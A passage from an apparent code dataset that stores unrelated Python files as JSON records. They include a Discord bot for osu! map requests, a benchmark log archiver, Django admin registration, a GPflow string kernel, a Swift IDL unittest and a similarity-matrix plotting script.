or\r\n not ctx.message.channel.parent_id == config.MAP_REQS\r\n ):\r\n return\r\n \r\n if ctx.message.channel.archived:\r\n return\r\n\r\n req_table = glob.db.table('map_reqs')\r\n \r\n Requests = Query()\r\n req = req_table.get((Requests.thread_id == ctx.message.channel.id) & (Requests.active == True))\r\n\r\n admin = await UserHelper.getDiscordUser(ctx.message.author.id)\r\n\r\n if not admin:\r\n return await ctx.send('who are yo')\r\n \r\n if type not in ('map', 'set'):\r\n msg = await ctx.reply('Invalid type! 
(map, set)')\r\n\r\n await msg.delete(delay=15)\r\n await ctx.message.delete(delay=15)\r\n return\r\n \r\n if status not in ('love', 'rank', 'unrank'):\r\n msg = await ctx.reply('Invalid status! (love, rank, unrank)')\r\n\r\n await msg.delete(delay=15)\r\n await ctx.message.delete(delay=15)\r\n return\r\n\r\n if type == \"map\": \r\n params = {\r\n \"set_id\": req['beatmap']['set_id']\r\n }\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/get_map_info\", params=params) as resp:\r\n if (\r\n resp and resp.status == 200 and\r\n resp.content.total_bytes != 2 # b'[]'\r\n ):\r\n bmaps = await resp.json()\r\n\r\n embed = Embed(\r\n title=f\"Pick a map to edit status on.\",\r\n timestamp=datetime.now(),\r\n color=0xeaff00\r\n )\r\n\r\n description = \"\"\r\n for idx, bmap in enumerate(bmaps['set']):\r\n description += f\"`#{idx + 1}.` **[{bmap['version']}]** - {convert_status_str(int(bmap['status']))}\\n\"\r\n \r\n embed.description = description\r\n emb_mess = await ctx.send(\"**Send position in chat to pick a map.**\", embed=embed)\r\n \r\n valid = False\r\n while valid is False:\r\n try:\r\n reply = await self.bot.wait_for('message', check=lambda x: x.channel == ctx.channel and x.author == ctx.author and x.content.isdecimal(), \r\n timeout=60.0)\r\n except asyncio.TimeoutError:\r\n msg = await ctx.send('Time is up!')\r\n\r\n await msg.delete(delay=15)\r\n await emb_mess.delete(delay=15)\r\n return\r\n else:\r\n reply.content = int(reply.content)\r\n if reply.content > len(bmaps) or reply.content <= 0:\r\n msg = await ctx.send('Specified position is out of range.')\r\n \r\n await reply.delete(delay=15)\r\n await msg.delete(delay=15)\r\n else:\r\n if (bm_status := bmaps['set'][reply.content - 1]['status']) == convert_str_status(status):\r\n msg = await ctx.send(f\"This map is already {convert_status_str(bm_status)}\")\r\n \r\n await msg.delete(delay=15)\r\n await reply.delete(delay=15)\r\n else:\r\n await reply.delete()\r\n await emb_mess.delete()\r\n\r\n valid = True\r\n \r\n params = {\r\n \"secret\": config.API_SECRET,\r\n \"action\": \"status_map\",\r\n \"admin\": admin['safe_name'],\r\n \"map_id\": bmaps['set'][reply.content - 1]['id'],\r\n \"status\": status\r\n }\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/handle_admin\", params=params) as resp:\r\n if resp.status == 200:\r\n await ctx.message.add_reaction('\\N{OK HAND SIGN}')\r\n else:\r\n pass\r\n\r\n elif type ==\"set\":\r\n params = {\r\n \"set_id\": req['beatmap']['set_id']\r\n }\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/get_map_info\", params=params) as resp:\r\n if (\r\n resp and resp.status == 200 and\r\n resp.content.total_bytes != 2 # b'[]'\r\n ):\r\n bmaps = await resp.json()\r\n \r\n\r\n if all([x['status'] == convert_str_status(status) for x in bmaps['set']]):\r\n msg = await ctx.send(f\"This set is already {convert_status_str(bmaps['set'][0]['status'])}\")\r\n\r\n await ctx.message.delete(delay=15)\r\n await msg.delete(delay=15)\r\n return\r\n\r\n params = {\r\n \"secret\": config.API_SECRET,\r\n \"action\": \"status_set\",\r\n \"admin\": admin['safe_name'],\r\n \"set_id\": req['beatmap']['set_id'],\r\n \"status\": status\r\n }\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/handle_admin\", params=params) as resp:\r\n if resp.status == 200:\r\n await ctx.message.add_reaction('\\N{OK HAND SIGN}')\r\n else:\r\n pass\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def rqclose(self, ctx: 
ContextWrap):\r\n if (\r\n not isinstance(ctx.message.channel, Thread) or\r\n not ctx.message.channel.parent_id == config.MAP_REQS\r\n ):\r\n return\r\n\r\n if ctx.message.channel.archived:\r\n return\r\n \r\n req_table = glob.db.table('map_reqs')\r\n \r\n Requests = Query()\r\n req = req_table.get((Requests.thread_id == ctx.message.channel.id) & (Requests.active == True))\r\n \r\n req_table.update(\r\n dbset('active', False),\r\n doc_ids=[req.doc_id]\r\n )\r\n \r\n first_message = await ctx.message.channel.parent.fetch_message(req['original_id'])\r\n \r\n await first_message.delete()\r\n await ctx.channel.delete()\r\n \r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def rqreject(self, ctx: ContextWrap, *reason: str):\r\n if (\r\n not isinstance(ctx.message.channel, Thread) or\r\n not ctx.message.channel.parent_id == config.MAP_REQS\r\n ):\r\n return\r\n \r\n if ctx.message.channel.archived:\r\n return\r\n\r\n req_table = glob.db.table('map_reqs')\r\n \r\n Requests = Query()\r\n req = req_table.get((Requests.thread_id == ctx.message.channel.id) & (Requests.active == True))\r\n\r\n first_message = await ctx.message.channel.parent.fetch_message(req['original_id'])\r\n requester = ctx.guild.get_member(req['requester'])\r\n\r\n params = {\r\n \"id\": req['beatmap']['id']\r\n }\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/get_map_info\", params=params) as resp:\r\n if (\r\n resp and resp.status == 200 and\r\n resp.content.total_bytes != 2 # b'[]'\r\n ):\r\n bmap = (await resp.json())['map']\r\n embed = Embed(\r\n title=f\"Map Request: {bmap['artist']} - {bmap['title']}\",\r\n color=ctx.author.color,\r\n description=f\"Your request has been rejected!\\n**Reason:** `{' '.join(reason)}`\\n\\n**Nominator:** {ctx.author.mention}\",\r\n timestamp=datetime.now()\r\n )\r\n\r\n embed.set_footer(text=\"Sakuru.pw osu! Private Server.\")\r\n embed.set_thumbnail(url=ctx.author.avatar.url)\r\n\r\n\r\n await requester.send(embed=embed)\r\n\r\n req_table.update(\r\n dbset('active', False),\r\n doc_ids=[req.doc_id]\r\n )\r\n\r\n await first_message.delete()\r\n await ctx.channel.delete()\r\n\r\ndef setup(bot):\r\n log(f\"Initiated {__name__} cog!\", Ansi.CYAN)\r\n bot.add_cog(AdminCog(bot))\r\n"} {"ext": "py", "sha": "1a2f0ac319a265e0b76169a4682ed41ed56851e5", "content": "#\n# Archives, to the specified folder, the logged output generated by a benchmark\n# run.\n#\n# @author A. 
Shawn Bandy\nimport os\nimport zipfile\nimport datetime\nimport requests\n# Follows closely from:\n# http://stackoverflow.com/a/34153816\n#\n# Paths to the log folders are generated by TFB and where those files\n# should be archived.\n#\npath_in = os.path.abspath(os.path.normpath(os.path.expanduser(os.path.join( \\\n os.environ['TFB_REPOPARENT'], os.environ['TFB_REPONAME'], \\\n 'results'))))\ndate_time = datetime.datetime.now()\ndt_folder = date_time.strftime('%Y%m%d%H%M%S')\npath_out = os.path.abspath(os.path.join(os.environ['TFB_LOGSFOLDER'], \\\n dt_folder))\n\nif not os.path.exists(path_out):\n os.makedirs(path_out)\n\nzip_path = path_out + '/results.zip'\n\nzip_file = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)\n\nfor root, dirs, files in os.walk(path_in):\n for file in files:\n zip_file.write(os.path.join(root, file))\n\nzip_file.close()\n\nresults_upload_uri = os.environ['TFB_UPLOADURI']\n\nif results_upload_uri != None:\n with open(zip_path, 'rb') as file_to_upload:\n requests.post(\n results_upload_uri,\n headers={'Content-Type': 'application/zip'},\n data=file_to_upload)\n"} {"ext": "py", "sha": "1a2f0b32b85926219cf94d50683571fd5d476b22", "content": "from django.contrib import admin\r\nfrom .models import Project, Course, Message, Demos\r\nfrom django.contrib.auth.models import Group\r\n\r\nclass CourseAdmin(admin.ModelAdmin):\r\n\tlist_display = ('title', 'category', 'date_created', 'link')\r\n\r\nclass ProjectAdmin(admin.ModelAdmin):\r\n\tlist_display = ('title', 'date_created', 'link')\r\n\r\nclass MessageAdmin(admin.ModelAdmin):\r\n\tlist_display = ('email', 'name', 'text', 'received', 'replied', 'date_created')\r\n\r\nclass DemosAdmin(admin.ModelAdmin):\r\n\tlist_display = ('title', 'demo_url')\r\n\r\nadmin.site.register(Course, CourseAdmin)\r\nadmin.site.register(Project, ProjectAdmin)\r\nadmin.site.register(Message, MessageAdmin)\r\nadmin.site.register(Demos, DemosAdmin)\r\nadmin.site.unregister(Group)"} {"ext": "py", "sha": "1a2f0caa5c880e7e202fdd47b38ad89340290b44", "content": "from gpflow.kernels import Kernel\nfrom gpflow.utilities import positive\nfrom gpflow import Parameter\nimport tensorflow as tf\nfrom tensorflow_probability import bijectors as tfb\n\nclass Batch_simple_SSK(Kernel):\n \"\"\"\n with hyperparameters:\n 1) match_decay float\n decrease the contribution of long subsequences\n 3) max_subsequence_length int \n largest subsequence considered\n \"\"\"\n\n def __init__(self,active_dims=[0],decay=0.1,max_subsequence_length=3,\n alphabet = [], maxlen=0, batch_size=100):\n super().__init__(active_dims=active_dims)\n # constrain decay kernel params to between 0 and 1\n self.logistic = tfb.Chain([tfb.Shift(tf.cast(0,tf.float64))(tfb.Scale(tf.cast(1,tf.float64))),tfb.Sigmoid()])\n self.decay_param= Parameter(decay, transform=self.logistic ,name=\"decay\")\n\n # use will use copies of the kernel params to stop building expensive computation graph\n # we instead efficientely calculate gradients using dynamic programming\n # These params are updated at every call to K and K_diag (to check if parameters have been updated)\n self.decay = self.decay_param.numpy()\n\n self.decay_unconstrained = self.decay_param.unconstrained_variable.numpy()\n\n self.order_coefs=tf.ones(max_subsequence_length,dtype=tf.float64)\n \n # store additional kernel parameters\n self.max_subsequence_length = tf.constant(max_subsequence_length)\n self.alphabet = tf.constant(alphabet)\n self.alphabet_size=tf.shape(self.alphabet)[0]\n self.maxlen = tf.constant(maxlen)\n self.batch_size = 
tf.constant(batch_size)\n\n # build a lookup table of the alphabet to encode input strings\n self.table = tf.lookup.StaticHashTable(\n initializer=tf.lookup.KeyValueTensorInitializer(\n keys=tf.constant([\"PAD\"]+alphabet),\n values=tf.constant(range(0,len(alphabet)+1)),),default_value=0)\n\n # initialize helful construction matricies to be lazily computed once needed\n self.D = None\n self.dD_dgap = None\n\n\n def K_diag(self, X):\n r\"\"\"\n The diagonal elements of the string kernel are always unity (due to normalisation)\n \"\"\"\n return tf.ones(tf.shape(X)[:-1],dtype=tf.float64)\n\n\n\n def K(self, X1, X2=None):\n r\"\"\"\n Vectorized kernel calc.\n Following notation from Beck (2017), i.e have tensors S,D,Kpp,Kp\n Input is two tensors of shape (# strings , # characters)\n and we calc the pair-wise kernel calcs between the elements (i.e n kern calcs for two lists of length n)\n D is the tensor than unrolls the recursion and allows vecotrizaiton\n \"\"\"\n\n # Turn our inputs into lists of integers using one-hot embedding\n # first split up strings and pad to fixed length and prep for gpu\n # pad until all have length of self.maxlen\n # turn into one-hot i.e. shape (# strings, #characters+1, alphabet size)\n X1 = tf.strings.split(tf.squeeze(X1,1)).to_tensor(\"PAD\",shape=[None,self.maxlen])\n X1 = self.table.lookup(X1)\n # keep track of original input sizes\n X1_shape = tf.shape(X1)[0]\n X1 = tf.one_hot(X1,self.alphabet_size+1,dtype=tf.float64)\n if X2 is None:\n X2 = X1\n X2_shape = X1_shape\n self.symmetric = True\n else:\n self.symmetric = False\n X2 = tf.strings.split(tf.squeeze(X2,1)).to_tensor(\"PAD\",shape=[None,self.maxlen])\n X2 = self.table.lookup(X2)\n X2_shape = tf.shape(X2)[0]\n X2 = tf.one_hot(X2,self.alphabet_size+1,dtype=tf.float64)\n \n # prep the decay tensors \n self._precalc()\n \n\n\n # combine all target strings and remove the ones in the first column that encode the padding (i.e we dont want them to count as a match)\n X_full = tf.concat([X1,X2],0)[:,:,1:]\n\n # get indicies of all possible pairings from X and X2\n # this way allows maximum number of kernel calcs to be squished onto the GPU (rather than just doing individual rows of gram)\n indicies_2, indicies_1 = tf.meshgrid(tf.range(0, X1_shape ),tf.range(X1_shape , tf.shape(X_full)[0]))\n indicies = tf.concat([tf.reshape(indicies_1,(-1,1)),tf.reshape(indicies_2,(-1,1))],axis=1)\n if self.symmetric:\n # if symmetric then only calc upper matrix (fill in rest later)\n indicies = tf.boolean_mask(indicies,tf.greater_equal(indicies[:,1]+ X1_shape ,indicies[:,0]))\n else:\n # if not symmetric need to calculate some extra kernel evals for the normalization later on\n indicies = tf.concat([indicies,tf.tile(tf.expand_dims(tf.range(tf.shape(X_full)[0]),1),(1,2))],0)\n\n # make kernel calcs in batches\n num_batches = tf.cast(tf.math.ceil(tf.shape(indicies)[0]/self.batch_size),dtype=tf.int32)\n k_split = tf.TensorArray(tf.float64, size=num_batches,clear_after_read=False,infer_shape=False)\n \n\n # iterate through batches\n for j in tf.range(num_batches):\n # collect strings for this batch\n indicies_batch = indicies[self.batch_size*j:self.batch_size*(j+1)]\n X_batch = tf.gather(X_full,indicies_batch[:,0],axis=0)\n X2_batch = tf.gather(X_full,indicies_batch[:,1],axis=0)\n\n # Make S: the similarity tensor of shape (# strings, #characters, # characters)\n #S = tf.matmul( tf.matmul(X_batch,self.sim),tf.transpose(X2_batch,perm=(0,2,1)))\n S = tf.matmul(X_batch,tf.transpose(X2_batch,perm=(0,2,1)))\n # collect results for the 
batch\n result = self.kernel_calc(S)\n k_split = k_split.write(j,result)\n\n # combine batch results\n k = tf.expand_dims(k_split.concat(),1)\n k_split.close()\n\n # put results into the right places in the gram matrix and normalize\n if self.symmetric:\n # if symmetric then only put in top triangle (inc diag)\n mask = tf.linalg.band_part(tf.ones((X1_shape,X2_shape),dtype=tf.int64), 0, -1)\n non_zero = tf.not_equal(mask, tf.constant(0, dtype=tf.int64))\n \n # Extracting the indices of upper triangle elements\n indices = tf.where(non_zero)\n out = tf.SparseTensor(indices,tf.squeeze(k),dense_shape=tf.cast((X1_shape,X2_shape),dtype=tf.int64))\n k_results = tf.sparse.to_dense(out)\n \n # add in mising elements (lower diagonal)\n k_results = k_results + tf.linalg.set_diag(tf.transpose(k_results),tf.zeros(X1_shape,dtype=tf.float64))\n \n # normalise\n X_diag_Ks = tf.linalg.diag_part(k_results)\n norm = tf.tensordot(X_diag_Ks, X_diag_Ks,axes=0)\n k_results = tf.divide(k_results, tf.sqrt(norm))\n else:\n\n # otherwise can just reshape into gram matrix\n # but first take extra kernel calcs off end of k and use them to normalise\n X_diag_Ks = tf.reshape(k[X1_shape*X2_shape:X1_shape*X2_shape+X1_shape],(-1,))\n X2_diag_Ks = tf.reshape(k[-X2_shape:],(-1,))\n k = k[0:X1_shape*X2_shape]\n k_results = tf.transpose(tf.reshape(k,[X2_shape,X1_shape]))\n # normalise\n norm = tf.tensordot(X_diag_Ks, X2_diag_Ks,axes=0)\n k_results = tf.divide(k_results, tf.sqrt(norm))\n\n\n return k_results\n\n\n def _precalc(self):\n r\"\"\"\n Update stored kernel params (incase they have changed)\n and precalc D and dD_dgap as required for kernel calcs\n following notation from Beck (2017)\n \"\"\"\n self.decay = self.decay_param.numpy()\n self.decay_unconstrained = self.decay_param.unconstrained_variable.numpy()\n\n tril = tf.linalg.band_part(tf.ones((self.maxlen,self.maxlen),dtype=tf.float64), -1, 0)\n # get upper triangle matrix of increasing intergers\n values = tf.TensorArray(tf.int32, size= self.maxlen)\n for i in tf.range(self.maxlen):\n values = values.write(i,tf.range(-i-1,self.maxlen-1-i)) \n power = tf.cast(values.stack(),tf.float64)\n values.close()\n power = tf.linalg.band_part(power, 0, -1) - tf.linalg.band_part(power, 0, 0) + tril\n tril = tf.transpose(tf.linalg.band_part(tf.ones((self.maxlen,self.maxlen),dtype=tf.float64), -1, 0))-tf.eye(self.maxlen,dtype=tf.float64)\n gaps = tf.fill([self.maxlen, self.maxlen],self.decay)\n \n self.D = tf.pow(gaps*tril, power)\n self.dD_dgap = tf.pow((tril * gaps), (power - 1.0)) * tril * power\n\n\n\n @tf.custom_gradient\n def kernel_calc(self,S):\n\n # fake computations to ensure we take the custom gradients for these two params\n a = tf.square(self.decay_param)\n\n if self.symmetric:\n k, dk_dgap = tf.stop_gradient(self.kernel_calc_with_grads(S))\n else:\n k = tf.stop_gradient(self.kernel_calc_without_grads(S))\n\n\n def grad(dy, variables=None):\n # get gradients of unconstrained params\n grads= {}\n if self.symmetric:\n grads['decay:0'] = tf.reduce_sum(tf.multiply(dy,dk_dgap*tf.math.exp(self.logistic.forward_log_det_jacobian(self.decay_unconstrained,0))))\n gradient = [grads[v.name] for v in variables]\n else:\n gradient = [None for v in variables]\n return ((None),gradient)\n\n\n return k, grad\n\n def kernel_calc_without_grads(self,S):\n\n # store squared match coef for easier calc later\n match_sq = tf.square(self.decay)\n\n\n # calc subkernels for each subsequence length (See Moss et al. 
2020 for notation)\n Kp = tf.TensorArray(tf.float64,size=self.max_subsequence_length,clear_after_read=False)\n\n # fill in first entries\n Kp = Kp.write(0, tf.ones(shape=tf.stack([tf.shape(S)[0], self.maxlen,self.maxlen]), dtype=tf.float64))\n\n # calculate dynamic programs\n for i in tf.range(self.max_subsequence_length-1):\n Kp_temp = tf.multiply(S, Kp.read(i))\n Kp_temp0 = match_sq * Kp_temp\n Kp_temp1 = tf.matmul(Kp_temp0,self.D)\n Kp_temp2 = tf.matmul(self.D,Kp_temp1,transpose_a=True)\n Kp = Kp.write(i+1,Kp_temp2)\n\n # Final calculation. We gather all Kps \n Kp_stacked = Kp.stack()\n Kp.close()\n\n # combine and get overall kernel\n aux = tf.multiply(S, Kp_stacked)\n aux = tf.reduce_sum(aux, -1)\n sum2 = tf.reduce_sum(aux, -1)\n Ki = sum2 * match_sq\n k = tf.linalg.matvec(tf.transpose(Ki),self.order_coefs)\n\n return k\n\n \n def kernel_calc_with_grads(self,S):\n # store squared match coef for easier calc later\n match_sq = tf.square(self.decay)\n # calc subkernels for each subsequence length (See Moss et al. 2020 for notation)\n Kp = tf.TensorArray(tf.float64,size=self.max_subsequence_length,clear_after_read=False)\n dKp_dgap = tf.TensorArray(tf.float64, size=self.max_subsequence_length, clear_after_read=False)\n\n # fill in first entries\n Kp = Kp.write(0, tf.ones(shape=tf.stack([tf.shape(S)[0], self.maxlen,self.maxlen]), dtype=tf.float64))\n dKp_dgap = dKp_dgap.write(0, tf.zeros(shape=tf.stack([tf.shape(S)[0], self.maxlen,self.maxlen]), dtype=tf.float64))\n\n # calculate dynamic programs\n for i in tf.range(self.max_subsequence_length-1):\n Kp_temp = tf.multiply(S, Kp.read(i))\n Kp_temp0 = match_sq * Kp_temp\n Kp_temp1 = tf.matmul(Kp_temp0,self.D)\n Kp_temp2 = tf.matmul(self.D,Kp_temp1,transpose_a=True)\n Kp = Kp.write(i+1,Kp_temp2)\n\n dKp_dgap_temp_1 = tf.matmul(self.dD_dgap,Kp_temp1,transpose_a=True)\n dKp_dgap_temp_2 = tf.multiply(S, dKp_dgap.read(i))\n dKp_dgap_temp_2 = dKp_dgap_temp_2 * match_sq\n dKp_dgap_temp_2 = tf.matmul(dKp_dgap_temp_2,self.D)\n dKp_dgap_temp_2 = dKp_dgap_temp_2 + tf.matmul(Kp_temp0,self.dD_dgap)\n dKp_dgap_temp_2 = tf.matmul(self.D,dKp_dgap_temp_2,transpose_a=True)\n dKp_dgap = dKp_dgap.write(i+1,dKp_dgap_temp_1 + dKp_dgap_temp_2)\n\n\n\n # Final calculation. We gather all Kps \n Kp_stacked = Kp.stack()\n Kp.close()\n dKp_dgap_stacked = dKp_dgap.stack()\n dKp_dgap.close()\n\n\n # combine and get overall kernel\n\n # get k\n aux = tf.multiply(S, Kp_stacked)\n aux = tf.reduce_sum(aux, -1)\n sum2 = tf.reduce_sum(aux, -1)\n Ki = sum2 * match_sq\n k = tf.linalg.matvec(tf.transpose(Ki),self.order_coefs)\n\n # get gap decay grads\n temp = tf.multiply(S, dKp_dgap_stacked)\n temp = tf.reduce_sum(temp, -1)\n temp = tf.reduce_sum(temp, -1)\n temp = temp * match_sq\n dk_dgap = tf.linalg.matvec(tf.transpose(temp),self.order_coefs)\n\n\n return k, dk_dgap\n\n"} {"ext": "py", "sha": "1a2f0cb42c5e281612c2dd86f9dc9461dd6f0c31", "content": "\"\"\"\nCompat. 
layer between LWR and Galaxy.\n\"\"\"\n"} {"ext": "py", "sha": "1a2f0d7d97d9d67d1ba8cf782e6bc6fb923479de", "content": "import unittest\nimport swift_idl as IDL\n\ntest_structure = {\n \"key.kind\" : \"source.lang.swift.decl.struct\",\n \"key.offset\" : 19,\n \"key.nameoffset\" : 26,\n \"key.namelength\" : 3,\n \"key.inheritedtypes\" : [\n {\n \"key.name\" : \"JSONDecodable\"\n }\n ],\n \"key.bodylength\" : 110,\n \"key.accessibility\" : \"source.lang.swift.accessibility.internal\",\n \"key.substructure\" : [\n {\n \"key.kind\" : \"source.lang.swift.decl.var.instance\",\n \"key.offset\" : 72,\n \"key.attributes\" : [\n {\n \"key.attribute\" : \"source.decl.attribute.__raw_doc_comment\"\n }\n ],\n \"key.nameoffset\" : 76,\n \"key.namelength\" : 2,\n \"key.length\" : 15,\n \"key.accessibility\" : \"source.lang.swift.accessibility.internal\",\n \"key.substructure\" : [\n\n ],\n \"key.typename\" : \"Int\",\n \"key.name\" : \"id\"\n },\n {\n \"key.kind\" : \"source.lang.swift.decl.var.instance\",\n \"key.offset\" : 92,\n \"key.nameoffset\" : 96,\n \"key.namelength\" : 5,\n \"key.length\" : 17,\n \"key.accessibility\" : \"source.lang.swift.accessibility.internal\",\n \"key.substructure\" : [\n\n ],\n \"key.typename\" : \"String\",\n \"key.name\" : \"query\"\n },\n {\n \"key.kind\" : \"source.lang.swift.decl.var.instance\",\n \"key.offset\" : 126,\n \"key.attributes\" : [\n {\n \"key.attribute\" : \"source.decl.attribute.__raw_doc_comment\"\n }\n ],\n \"key.nameoffset\" : 130,\n \"key.namelength\" : 1,\n \"key.length\" : 13,\n \"key.accessibility\" : \"source.lang.swift.accessibility.internal\",\n \"key.substructure\" : [\n\n ],\n \"key.typename\" : \"String\",\n \"key.name\" : \"z\"\n }\n ],\n \"key.name\" : \"Foo\",\n \"key.length\" : 138,\n \"key.bodyoffset\" : 46\n}\n\ntest_syntax = [\n { \"offset\" : 0, \"length\" : 6, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 7, \"length\" : 10, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 19, \"length\" : 6, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 26, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 31, \"length\" : 13, \"type\" : \"source.lang.swift.syntaxtype.typeidentifier\" },\n { \"offset\" : 47, \"length\" : 21, \"type\" : \"source.lang.swift.syntaxtype.comment\" },\n { \"offset\" : 72, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 76, \"length\" : 2, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 80, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.typeidentifier\" },\n { \"offset\" : 86, \"length\" : 1, \"type\" : \"source.lang.swift.syntaxtype.number\" },\n { \"offset\" : 92, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 96, \"length\" : 5, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 103, \"length\" : 6, \"type\" : \"source.lang.swift.syntaxtype.typeidentifier\" },\n { \"offset\" : 110, \"length\" : 12, \"type\" : \"source.lang.swift.syntaxtype.comment\" },\n { \"offset\" : 126, \"length\" : 3, \"type\" : \"source.lang.swift.syntaxtype.keyword\" },\n { \"offset\" : 130, \"length\" : 1, \"type\" : \"source.lang.swift.syntaxtype.identifier\" },\n { \"offset\" : 133, \"length\" : 6, \"type\" : \"source.lang.swift.syntaxtype.typeidentifier\" },\n { \"offset\" : 144, \"length\" : 12, \"type\" : \"source.lang.swift.syntaxtype.comment\" }\n]\n\ntest_source = '''import 
Foundation\n\nstruct Foo: JSONDecodable { // sample:\"foo,,bar\"\n let id: Int = 3\n let query: String // json:\"q\"\n let z: String // json:\"-\"\n}\n'''\n\n\nclass SampleStructTest(unittest.TestCase):\n def test_getSwiftTokens(self):\n tk = IDL.getSwiftTokens(test_syntax, test_source)\n self.assertEqual('import', tk[0].content)\n self.assertEqual(1, tk[0].line)\n self.assertEqual('source.lang.swift.syntaxtype.keyword', tk[0].tokenType)\n\n self.assertEqual('}\\n', tk[-1].content)\n self.assertEqual(7, tk[-1].line)\n self.assertEqual('omittedtoken', tk[-1].tokenType)\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f0e73329d5f6f22c7b9c749947d10b973a0fe", "content": "from os import getcwd\r\nimport sys\r\n\r\nsys.path.append(getcwd() + '/..') # Add src/ dir to import path\r\nimport traceback\r\nimport logging\r\nfrom os.path import join\r\nfrom itertools import combinations\r\n\r\nimport networkx as nx\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nimport libs.osLib as ol\r\n\r\n\r\ndef removeDiagonal(A):\r\n m = A.shape[0]\r\n strided = np.lib.stride_tricks.as_strided\r\n s0,s1 = A.strides\r\n return strided(A.ravel()[1:], shape=(m-1, m), strides=(s0+s1, s1)).reshape(m, -1)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n root = logging.getLogger()\r\n root.setLevel(logging.DEBUG)\r\n\r\n baseDir, outputDir = '../../data/adjacencyMatrices', '../../data/plots'\r\n loadNodeMappings, loadAdjacencies = True, False\r\n\r\n numClusters = 2\r\n\r\n classMapping = {\r\n 'time': 'T',\r\n 'content': 'C',\r\n 'tag': 'G',\r\n 'location': 'L',\r\n }\r\n\r\n try:\r\n # metapaths = [['time', 'content', 'time'], ['tag', 'content', 'tag'], ['location', 'content', 'location'] ] # ['time', 'content', 'time'] # #\r\n metapaths = [['time', 'content', 'time']]\r\n metapaths = [[classMapping[t] for t in metapath] for metapath in metapaths]\r\n\r\n for metapath in metapaths:\r\n nodeMapping = ol.loadPickle(join(baseDir, f'nodeMapping.pickle'))\r\n\r\n # PathSim load\r\n similarityM = ol.loadSparce(join(baseDir, f'similarity-{\"\".join(metapath)}.npz')).toarray()\r\n\r\n # Sclump load\r\n # similarityM = ol.loadNumpy(join(baseDir, f'SClump-similarity.npy'))\r\n\r\n similarityM = removeDiagonal(similarityM) # Carefull here - we're removing the relation with itself but breaking the mapping from nodeMapping\r\n\r\n # Remove all zeros\r\n print(f'Orig shape: {similarityM.shape}')\r\n similarityM = similarityM[~np.all(similarityM == 0, axis=1)]\r\n similarityM = similarityM[:, ~np.all(similarityM == 0, axis=0)]\r\n print(f'Without zeros shape: {similarityM.shape}')\r\n\r\n # Plot simple value histogram\r\n flattenSim = pd.Series(similarityM.flatten())\r\n g = sns.distplot(flattenSim, kde=False, bins=10)\r\n g.set_yscale('log')\r\n plt.savefig(join(outputDir, f'similarityValueDistribution-{\"\".join(metapath)}.png'))\r\n plt.title('Value count in Similarity Matrix')\r\n print(similarityM.max())\r\n\r\n # Count non-zeros per row\r\n rowCountNonZero = np.count_nonzero(similarityM, axis=1)\r\n\r\n # Count max value per row\r\n rowCountMax = np.amax(similarityM, 1)\r\n\r\n # Count min value (that's not a zero) per row\r\n rowCountMinNonZero = np.where(similarityM > 0, similarityM, similarityM.max()).min(1)\r\n\r\n # Count mean value (that's not a zero) per row\r\n rowCountMeanNonZero = np.true_divide(similarityM.sum(1), (similarityM!=0).sum(1))\r\n\r\n plotDf = None\r\n for k, x in {\r\n 'Non zeros per row': rowCountNonZero,\r\n 'Max 
per row': rowCountMax,\r\n 'Mean per row (no zeros)': rowCountMeanNonZero,\r\n 'Min per row (no zeros)': rowCountMinNonZero,\r\n }.items():\r\n auxDf = pd.Series(x, name='Count').to_frame()\r\n auxDf['Measure'] = k\r\n plotDf = auxDf if plotDf is None else pd.concat([plotDf, auxDf], ignore_index=False)\r\n\r\n # Make boxplot\r\n fig, ax = plt.subplots(figsize=(15, 15))\r\n g = sns.boxplot(ax=ax, data=plotDf, x='Measure', y='Count', palette=\"Set2\", showfliers=True, showmeans=True)\r\n g.set_yscale('log')\r\n g.set_yticklabels(g.get_yticks(), size=16)\r\n # g.set_xticklabels(g.get_xticks(), size=16)\r\n plt.savefig(join(outputDir, f'statsPerRow-log-{\"\".join(metapath)}.png'))\r\n plt.close()\r\n\r\n # Make boxplot\r\n fig, ax = plt.subplots(figsize=(15, 15))\r\n g = sns.boxplot(ax=ax, data=plotDf, x='Measure', y='Count', palette=\"Set2\", showfliers=False, showmeans=True)\r\n g.set_yticklabels(g.get_yticks(), size=16)\r\n # g.set_xticklabels(g.get_xticks(), size=16)\r\n plt.savefig(join(outputDir, f'statsPerRow-{\"\".join(metapath)}.png'))\r\n plt.close()\r\n\r\n # Make violin plots\r\n fig = plt.figure(figsize=(12, 12))\r\n gs = fig.add_gridspec(3, 2)\r\n\r\n ax = fig.add_subplot(gs[0, 0])\r\n sns.violinplot(data=similarityM.flatten())\r\n ax.set_xlabel(\"Similarity as is\")\r\n\r\n ax = fig.add_subplot(gs[0, 1])\r\n sns.violinplot(data=rowCountNonZero)\r\n ax.set_xlabel(\"Non zeros per row\")\r\n\r\n ax = fig.add_subplot(gs[1, 0])\r\n sns.violinplot(rowCountMeanNonZero)\r\n ax.set_xlabel(\"Mean per row (no zeros)\")\r\n\r\n ax = fig.add_subplot(gs[1, 1])\r\n sns.violinplot(rowCountMinNonZero)\r\n ax.set_xlabel(\"Min per row (no 